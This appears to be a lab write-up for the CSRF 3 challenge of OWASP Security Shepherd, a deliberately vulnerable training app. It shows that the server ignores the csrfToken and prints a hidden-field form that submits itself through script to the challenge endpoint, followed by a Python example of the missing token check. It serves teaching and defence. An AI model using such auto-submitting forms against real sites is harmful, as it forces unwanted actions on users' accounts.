OWASP Security Shepherd Project - CSRF 3 (CSRF Challenge)
Challenge
Solution
This challenge is quite similar to challenge 2, except that it requires another parameter, csrfToken. So the question is: how can we obtain a matching csrfToken? By capturing the HTTP request with Burp Suite, we know that our own csrfToken is -86594039104534445463367774171196943428.
Then, by checking the source code of this challenge's web page, it seems that the csrfToken is hard-coded in the form (at least for our current user), and they are all -86594039104534445463367774171196943428.
As a result, we could guess that the csrfToken never changes. This makes our form the following:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengethree/plusplus" method="POST">
<input type="hidden" name="userid" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
<input type="hidden" name="csrfToken" value="-86594039104534445463367774171196943428"/>
<input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>
Let's log in as another user to see if we have a working CSRF attack!
Great! We pass the challenge! But... wait a minute. Let's check the page source for this user to see if the csrfToken is really a hard-coded value.
Well, it is not... Now we know that the csrfToken is not a fixed value, but it is not checked by the server :P That is so funny, so the csrfToken here is just a redundant parameter ~ WOW
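The server-side check whose absence this challenge demonstrates, as an added example (it is not Security Shepherd's code and not from the original post). The in-memory session store, the handler names and the sample userid are assumptions made for illustration.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> CSRF token (hypothetical).
SESSIONS = {}

def new_session():
    """Create a session and bind a fresh, unpredictable CSRF token to it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = secrets.token_hex(32)
    return sid

def handle_unchecked(sid, form):
    """Behaviour seen in the write-up: csrfToken is received but never compared."""
    return sid in SESSIONS and "userid" in form

def handle_checked(sid, form):
    """Accept only if csrfToken equals the token bound to the requesting session."""
    expected = SESSIONS.get(sid)
    supplied = form.get("csrfToken")
    if expected is None or not isinstance(supplied, str):
        return False  # unknown session, or token missing / wrong type
    # Constant-time comparison avoids leaking the token through timing.
    same = hmac.compare_digest(expected.encode(), supplied.encode())
    return same and "userid" in form

def demo():
    attacker, victim = new_session(), new_session()
    uid = "constructed-user-id"  # constructed sample value
    # A cross-site form can only carry a token its author knows (their own),
    # while the browser attaches the victim's session cookie to the request.
    forged = {"userid": uid, "csrfToken": SESSIONS[attacker]}
    genuine = {"userid": uid, "csrfToken": SESSIONS[victim]}
    return {
        "unchecked_forged": handle_unchecked(victim, forged),
        "checked_forged": handle_checked(victim, forged),
        "checked_missing": handle_checked(victim, {"userid": uid}),
        "checked_genuine": handle_checked(victim, genuine),
    }

if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {'accepted' if accepted else 'rejected'}")
```

A per-user token only protects the endpoint when the handler compares it against the value stored for the session that sent the request; the unchecked handler accepts the forged form exactly as the challenge did.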